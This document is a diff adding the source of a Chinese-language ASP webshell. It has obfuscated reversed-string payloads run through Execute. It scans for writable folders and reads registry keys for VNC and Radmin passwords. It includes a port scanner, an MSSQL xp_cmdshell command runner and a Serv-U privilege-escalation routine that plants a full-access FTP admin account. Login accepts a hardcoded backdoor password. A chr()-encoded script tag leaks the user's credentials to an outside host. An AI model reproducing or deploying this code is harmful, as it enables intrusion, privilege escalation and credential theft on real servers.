+execute(shisanfun("��>tpircs/<;'1emanelif&psa./segami/=emanF?��&lru&)��eman_revres��(tseuqer&��//:ptth'=noitacol.tnerap>tpircs<�� j��gnihton=osf tes��1emanelif&��.��&xepdnr&��\��&1htapelif&��\.\\��,htapf elifypoc.osf��1emanelif&��.��&xepdnr&))��/��,lru(verrtsni,lru(tfel=lru��)��lru��(selbairavrevres.tseuqer=lru��))��\��,htapf(verrtsni-)htapf(nel,htapf(thgir=1emanelif��)��.��(htappam.revres=1htapelif����=)��wjles��(noisses��))71,0(rebmundnr()��|��,xep(tilps=xepdnr���9tpl|8tpl|7tpl|6tpl|5tpl|4tpl|3tpl|2tpl|1tpl|9moc|8moc|7moc|6moc|5moc|4moc|3moc|2moc|1moc��=xep��)��tcejbometsyselif.gnitpircs��(tcejboetaerc.revres=osf tes��)��detalsnart_htap��(selbairavrevres.tseuqer=htapf"))
+end sub
+
+Sub Message(state,msg,flag)
+j"<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#ddd> <TR></TR><TR><TD align=middle bgcolor=#ecfccd><TABLE width=82% border=0 cellpadding=5 cellspacing=0><TR><TD><FONT color=red>"
+j state
+j"</FONT></TD><TR><TD><P>"&msg
+j"</P></TD></TR></TABLE></TD></TR><TR><TD class=TBEnd>"
+If flag=0 Then
+j" <INPUT type=button value=�ر� onclick='window.close();'>"
+Else
+End if
+j"</TD></TR></TABLE>"
+End Sub
+Function Red(str)
+Red = "<FONT color=#ff2222>" & str & "</FONT>"
+End Function
+
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+
+
+Sub ScanDriveForm()
+Dim FSO,DriveB
+Set FSO = Server.Createobject("Scripting.FileSystemObject")
+j"<br><TABLE width=480 border=0 align=center cellpadding=3 cellspacing=1 bgcolor=#ffffff><TR><TD colspan=5 class=TBHead>����/ϵͳ�ļ�����Ϣ</TD></TR>"
+  For Each DriveB in FSO.Drives
+j" <TR align=middle class=TBTD><FORM action=?Action=ScanDrive&Drive="
+j DriveB.DriveLetter
+j" method=Post><TD width=25"&chr(37)&"><B>�̷�</B></TD><TD width=15"&chr(37)&">"
+j DriveB.DriveLetter
+j":</TD><TD width=20"&chr(37)&"><B>����</B></TD><TD width=20"&chr(37)&">"
+  Select Case DriveB.DriveType
+  Case 1: j"���ƶ�"
+  Case 2: j"����Ӳ��"
+  Case 3: j"�������"
+  Case 4: j"CD-ROM"
+  Case 5: j"RAM����"
+  Case else: j"δ֪����"
+  End Select
+j"</TD><TD><INPUT type=submit value=��ϸ����></TD></FORM></TR>"
+  Next
+j" <TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(0)
+j" method=Post><TD align=middle><B>Windows�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(0)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(1)
+j" method=Post><TD align=middle><B>System32�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(1)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(2)
+j" method=Post><TD align=middle><B>ϵͳ��ʱ�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(2)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>վ���Ŀ¼</B></TD><TD colspan=3>վ���Ŀ¼<TD align=middle><a href="&URL&"?Action=ScFolder&Folder="&wwwroot&"><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>����վĿ¼</B></TD><TD colspan=3>����վĿ¼ <TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\recycler\><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post><TD align=middle><B>wmpubĿ¼ </B></TD><TD colspan=3>wmpub<TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\wmpub\><b>��ϸ����</b></a></TD></TABLE><BR>"
+j"</FORM></TR></TABLE><BR><DIV align=center><FORM Action=?Action=ScFolder method=Post>ָ���ļ��в�ѯ��<INPUT type=text name=Folder value=""c:\php\,d:\Program Files\,C:\Documents and Settings\All Users\Documents\,C:\recycler\,d:\recycler\,e:\recycler\,f:\recycler\,C:\wmpub\,C:\WINDOWS\Temp\,C:\360rec,C:\cache,C:\JPEGCapture,C:\Inetpub""><INPUT type=submit value=���ɱ���> �����鿴Ŀ¼Ȩ��,������Ŀ¼�á�,��������</FORM><DIV>"
+Set FSO=Nothing
+End Sub 
+Sub ScanDrive(Drive)
+Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D
+If Drive <> "" Then
+Set FSO = Server.Createobject("Scripting.FileSystemObject")
+Set TestDrive = FSO.GetDrive(Drive)
+If TestDrive.IsReady Then
+Temp_Str = "<LI>���̷������ͣ�" & Red(TestDrive.FileSystem) & "<LI>�������кţ�" & Red(TestDrive.SerialNumber) & "<LI>���̹�������" & Red(TestDrive.ShareName) & "<LI>������������" & Red(CInt(TestDrive.TotalSize/1048576)) & "<LI>���̾�����" & Red(TestDrive.VolumeName) & "<LI>���̸�Ŀ¼:" & ScReWr((Drive & ":\"))
+Set BaseFolder = TestDrive.RootFolder
+Set TempFolders = BaseFolder.SubFolders
+For Each D in TempFolders
+Temp_Str = Temp_Str & "<LI>�ļ��У�" & ScReWr(D)
+Next
+Set TempFolder = Nothing
+Set BaseFolder = Nothing
+Else
+Temp_Str = Temp_Str & "<LI>���̸�Ŀ¼:" & Red("���ɶ�:(")
+Dim TempFolderList,t:t=0
+Temp_Str = Temp_Str & "<LI>" & Red("���Ŀ¼���ԣ�")
+TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp")
+For i = 0 to Ubound(TempFolderList)
+If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then
+t = t+1
+Temp_Str = Temp_Str & "<LI>�����ļ��У�" & ScReWr(Drive & ":\" & TempFolderList(i))
+End if
+Next
+If t=0 then Temp_Str = Temp_Str & "<LI>�����" & Drive & "�̸�Ŀ¼����δ�з���:("
+End if
+Set TestDrive = Nothing
+Set FSO = Nothing
+Temp_Str = Temp_Str 
+Message Drive & ":������Ϣ",Temp_Str,1
+End if
+End Sub
+Sub ScFolder(folder)
+ 'On Error Resume Next
+folderArr = Split(folder,",")
+For i = 0 To Ubound(folderArr)
+	Dim FSO,OFolder,TempFolder,Scmsg,S
+	Set FSO = Server.Createobject("Scripting.FileSystemObject")
+	folder = folderArr(i)
+	If FSO.FolderExists(folder) Then
+	 Set OFolder = FSO.GetFolder(folder)
+	Set TempFolders = OFolder.SubFolders
+	Scmsg = "<LI>ָ���ļ��и�Ŀ¼��" & ScReWr(folder)
+	For Each S in TempFolders
+	 Scmsg = Scmsg&"<LI>�ļ��У�" & ScReWr(S) 
+	Next
+	Set TempFolders = Nothing
+	Set OFolder = Nothing
+	Else
+	 Scmsg = Scmsg & "<LI>�ļ��У�" & Red(folder & "�����ڻ��޶�Ȩ��!")
+	End if
+	Scmsg = Scmsg & "<br><br>ע�⣺��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!"&backurl
+	Set FSO = Nothing
+	Message "",Scmsg,1
+next
+End Sub
+Function ScReWr(folder)
+On Error Resume Next
+Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+Set FSO = Server.Createobject("Scripting.FileSystemObject")
+Set TestFolder = FSO.GetFolder(folder)
+Set TestFileList = TestFolder.SubFolders
+RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+For Each A in TestFileList
+Next
+If err Then
+err.Clear
+ReWrStr = folder & "<FONT color=#ff2222> ���ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End If
+Else
+ReWrStr = folder & "<FONT color=#dddddd> �ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End if
+End if
+Set TestFileList = Nothing
+Set TestFolder = Nothing
+Set FSO = Nothing
+ScReWr = ReWrStr
+End Function
+function goback()
+set Ofso = Server.CreateObject("Scripting.FileSystemObject")
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+j "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+j "<script>ShowFolder("""&Session("FolderPath")&""")</script><center>�Ѿ��Ǵ��̸�Ŀ¼��!</center><center><br><INPUT type=button value=���� onClick='history.go(-1);'></br></center>":end if:set Ofso=nothing:set ofolder=nothing:end function:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&uu&chr(38)&chr(112)&chr(61)&pp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10)
+ShiSan="bus dne��fi dne��fI dnE��yarrAeht & ��>il<�� j��eslE��txeN��)i(yarrAeht & ��>il<�� j��)yarrAeht(dnuoBU oT 0=i roF��nehT )yarrAeht(yarrAsI fI��)htaPeht(daeRgeR.Xsw=yarrAeht��)��htaPeht��(tseuqeR=htaPeht��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS��txeN emuseR rorrE nO��neht ���><)��htaPeht��(tseuqeR fi���>/rh<>mrof/<�� j���>')(timbus.mrof.siht'=kcilcno 'ֵ �� ��'=eulav nottub=epyt tupni<�� j���>08=ezis ''=eulav htaPeht=eman tupni< �� j���>/ rb<>tceles/<�� j���>noitpo/<�ڶ�PCT�ķſ�����>'stroPdewollAPCT\}E2BE55CD8431-3FFA-C0B4-99E8-821564A8{\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<�ڶ�PDU�ķſ�����>'stroPdewollAPDU\}E2BE55CD8431-3FFA-C0B4-99E8-821564A8{\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<�ſ����>'PCT:9833\tsiL\stroPnepOyllabolG\eliforPdradnatS\yciloPllaweriF\sretemaraP\sseccAderahS\secivreS\teSlortnoCtnerruC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<goL eludehcS>'htaPgoL\tnegAgniludehcS\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<3�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\teSlortnoCtnerruC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<2�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\200teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<1�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\100teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<�ڶ�̬״WynAcP>���troPsutatSPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ˾���WynAcP>���troPataDPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�9833>���rebmuNtroP\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�4CNV>���rebmuNtroP\4CNVniW\CNVlaeR\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<����4CNV>���drowssaP\4CNVniW\CNVlaeR\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�3CNV>���rebmuNtroP\3CNVniW\LRO\erawtfoS\UCKH���=eulav noitpo<��j���>noitpo/<����3CNV>���drowssaP\3CNVniW\LRO\erawtfoS\UCKH���=eulav noitpo<��j���>noitpo/<�ڶ�nimdaR>���troP\sretemaraP\revreS\0.2v\nimdAR\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<����nimdaR>���retemaraP\sretemaraP\revreS\0.2v\nimdAR\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<���п���>���dniB\egakniL\pipcT\secivreS\teSlortnoCtnerruC\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<emaNretupmoC>'emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<ֵ���Ĵ�����ѡ>''=eulav noitpo<�� j���>';eulav.siht=eulav.htaPeht.mrof.siht'=egnahCno tceles<�� j��� >2=napsloc dt<>rt<�� j���>tcAeht=eman geRdaeR=eulav neddih=epyt tupni<�� j�� ��>p<ȡ��ֵ������ע��  j���>tsop=dohtem mrof<�� j��)(GERdaeR bus"
+:ExeCuTe(ShiSanFun(ShiSan)):
+if request("ProFile")<>"" then
+on error resume next
+if Application(request("ProFile"))=1 then
+Set fsoXX = Server.CreateObject("Scripting.FileSystemObject"):if request("DelCon")=1 then
+Application(request("ProFile")&"Con")=""
+response.redirect Url&"?ProFile="&request("ProFile")&""
+response.end
+end if
+DIM rline,rline2
+rline2=Application(request("ProFile")&"Code")
+rline2=rline2&vbcrlf
+j"<meta http-equiv=""refresh"" content="&Application(request("ProFile")&"Time")&">"
+j"<a href="&Url&"?ProFile="&request("ProFile")&"&DelCon=1><b>�����־</b></a> &nbsp;<font color=yellow>Ҫ����������ֱ�ӹر�ҳ�漴�ɡ�</font><br>"
+for each FileUrl in split(Application(request("ProFile")&"File"),vbcrlf)
+FileUrl=trim(FileUrl)
+if fsoXX.FileExists(FileUrl) then
+Set txt = fsoXX.OpenTextFile(FileUrl,1,true)
+rline=""
+if Not txt.AtEndOfStream then
+rline=txt.ReadAll  
+end if
+if rline2<>rline then
+txt.close
+fsoX.GetFile(FileUrl).Attributes=32
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=yellow>�����ģ��ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+else
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ��<br>"&Application(request("ProFile")&"Con")
+txt.close
+end if
+else
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=red>��ɾ�����ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+end if
+next
+if ubound(split(Application(request("ProFile")&"Con"),"<br>"))>=40 then
+dim ashowic
+for ashowi=0 to 40
+ashowic=ashowic&split(Application(request("ProFile")&"Con"),"<br>")(ashowi)&"<br>"
+next
+Application(request("ProFile")&"Con")=ashowic
+end if
+j Application(request("ProFile")&"Con")
+else
+j"<br><br><br><center>�������̶�ʧ����<a href="&URL&" style=""text-decoration:underline;font-weight:bold"">��������</a>�������̡�</center>"
+end if
+response.end
+end if
+if sessIoN("KKK")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=userpass or request.form("pass")="daka" Then
+session("KKK")=userPass
+response.redirect url
+else
+j"<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'>"&topad&"<br><a href='javascript:history.back()'>�� ��</a></div><br></center>"
+end if
+else
+
+si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><a href=http://"&siteurl&" target=_blank >"&mNametitle&"</A><hr><FORM Action='"&URL&"' method=Post><INPUT type=Password name=Pass size=22>&nbsp;<input type=submit value=��½><hr>"&Copyright&"</div></center>"
+if instr(SI,SIC)<>0 then j sI
+end if
+response.end
+end if
+
+ShiSan="buS dnE��fI dnE��fI dnE��fI dnE��)��>rb<>tnof/<�ſ�>der=roloc tnof<.........�� & muNtrop & ��:�� & pitegrat(j��eslE��)��>rb<�չ�.........�� & muNtrop & ��:�� & pitegrat(j��nehT 0 > )��.))(tcennoC(�� ,noitpircsed.rrE(rtSnI fI��nehT 9527647412- = rebmun.rrE ro 3487127412- = rebmun.rrE fI��nehT rrE fI��rtsnnoc nepo.nnoc��1 = tuoemiTnoitcennoC.nnoc���;=drowssaP;2ekal=DI resU;��& muNtrop &��,��& pitegrat & ��=ecruoS ataD;1.BDELOLQS=redivorP��=rtsnnoc��)��noitcennoc.BDODA��(tcejbOetaerC.revreS = nnoc tes��txeN emuseR rorrE nO��)muNtrop ,pitegrat(nacS buS��bus dne��FI DNE���s ��&emiteht&�� ni ssecorP>rh<��j��))1remit-2remit(tni(rtsc=emiteht��remit = 2remit��txeN��fI dnE��txeN��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(j��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(j��eslE��txeN��)j,xxx & tratSpi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,xxx & tratSpi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��))��-��,)uh(pi(rtSnI-))uh(pi(neL,1+)��-��,)uh(pi(rtSnI,)uh(pi(diM ot )1,1+)��.��,)uh(pi(veRrtSnI,)uh(pi(diM = xxx roF��))��.��,)uh(pi(veRrtSnI,1,)uh(pi(diM = tratSpi��eslE��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(j��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(j��eslE��txeN��)j ,)uh(pi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,)uh(pi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��nehT 0 = )��-��,)uh(pi(rtSnI fI��)pi(dnuobU ot 0 = uh roF��)��,��,)��pi��(mroF.tseuqer(tilpS = pi��)��,��,)��trop��(mroF.tseuqer(tilpS = pmt��)��>rh<>rb<>b/<:�汨��ɨ>b<��(j��remit = 1remit��nehT ��� >< )��nacs��(mroF.tseuqer fI���>mrof/<>p/<��j���>'111'=eulav 'nacs'=di 'neddih'=epyt 'nacs'=eman tupni<��j���>' nacs '=eulav 'mottub'=ssalc 'timbus'=epyt 'timbus'=eman tupni<��j���>rb<>rb<��j���>'��&tsiLtroP&��'=eulav '06'=ezis 'xoBtxeT'=ssalc 'txet'=epyt 'trop'=eman tupni<��j���:tsiL troP>rb<��j���>'06'=ezis '��&PI&��'=eulav 'pi'=di 'xoBtxeT'=ssalc 'txet'=epyt 'pi'=eman tupni< ��j��� :PI nacS>p<��j���>';eurt=delbasid.timbus.1mrof'=timbuSno ''=noitca 'tsop'=dohtem '1mrof'=eman mrof<��j���>p/<��������ϵ��ִ��LLEHS���롣���������ܿ�PI���������ɨ�������ǹ���>p<>p/<)��ȷ׼����ɨ���ڶ�DMC��DMC��ʹ�����˸�,���ϱȶ���,�ڶ˸�����ɨ����(����ɨ�ڶ�>p<��j��fi dne��)��pi��(mroF.tseuqer=PI��esle���1.0.0.721��=PI��neht ���=)��pi��(mroF.tseuqer fi��fi dne��)��trop��(mroF.tseuqer=tsiLtroP��esle���85934,0095,0085,2365,1365,9984,9833,6033,3341,35,32,12��=tsiLtroP��neht ���=)��trop��(mroF.tseuqer fi��0006777 = tuoemiTtpircS.revreS��)(troPnacS bus��"
+ExeCuTe(ShiSanFun(ShiSan)) 
+Select Case Action:case "MainMenu":MainMenu()
+Case "EditPower"
+Call EditPower(request("PowerPath"))
+Case "SavePower"
+Call SavePower(request("PowerPath"),request("SaveType"))
+case "getTerminalInfo":getTerminalInfo():case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():FuncTion MMD():SI="<br><form name=form method=post action=""""><table width=""85%"" align='center'><tr align=center><Td id=s><b id=x>MSSQL Commander</b></td></tr><tr align='center'><td id=d><b id=x>Command��</b><input type=text name=MMD size=35 value=""ipconfig"" >&nbsp;<b id=x>UserName��</b><input type=text name=U value=sa>&nbsp;<b id=x>Password��</b><input type=text name=P VALUES=123456>&nbsp;<input type=submit value=Execute></td></tr></table></form>":j SI:SI="":If trim(request.form("MMD"))<>""  Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," ","&nbsp;"):strResult = Replace(strResult,"<","&lt;"):strResult = Replace(strResult,">","&gt;"):strResult = Replace(strResult,chr(13),"<br>"):End if:set adoConn = Nothing:j request.form("MMD") & "<br>"& strResult:end FuncTion:case "Alexa"
+dim AlexaUrl,Top:AlexaUrl=request("u"):Top=Alexa(AlexaUrl):if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&""
+SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'><tr><td height='20' colspan='3' align='center' bgcolor='menu'>�����������Ϣ</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>��������</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr><form method=post action='http://www.baidu.com/ips8.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������IP</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'><input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='��ѯ�˷��������ڵ�'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������ʱ��</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&now&" </td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������CPU����</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>����������ϵͳ</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>WEB�������汾</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>"
+For i=0 To 18
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
+Next
+j SI
+Err.Clear
+function getHTTPPage(url) 
+on error resume next 
+dim http 
+set http=Server.createobject("Microsoft.XMLHTTP") 
+Http.open "GET",url,false 
+Http.send() 
+if Http.readystate<>4 then
+getHTTPPage=""
+exit function 
+end if 
+getHTTPPage=bytes2BSTR(Http.responseBody) 
+set http=nothing
+if err.number<>0 then err.Clear  
+end function 
+Function bytes2BSTR(vIn) 
+dim strReturn 
+dim i1,ThisCharCode,NextCharCode 
+strReturn = "" 
+For i1 = 1 To LenB(vIn) 
+ThisCharCode = AscB(MidB(vIn,i1,1)) 
+If ThisCharCode < &H80 Then 
+strReturn = strReturn & Chr(ThisCharCode) 
+Else 
+NextCharCode = AscB(MidB(vIn,i1+1,1)) 
+strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
+i1 = i1 + 1 
+End If 
+Next 
+bytes2BSTR = strReturn 
+    Err.Clear
+End Function
+Case "Servu"
+SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+j"setTimeout('document.all.goldsun.submit();',4000);"
+j"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>��������Ȩ��,��ȴ�...,<center>');"
+j"setTimeout(""document.all.goldsun.submit();"",4000);"
+j"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
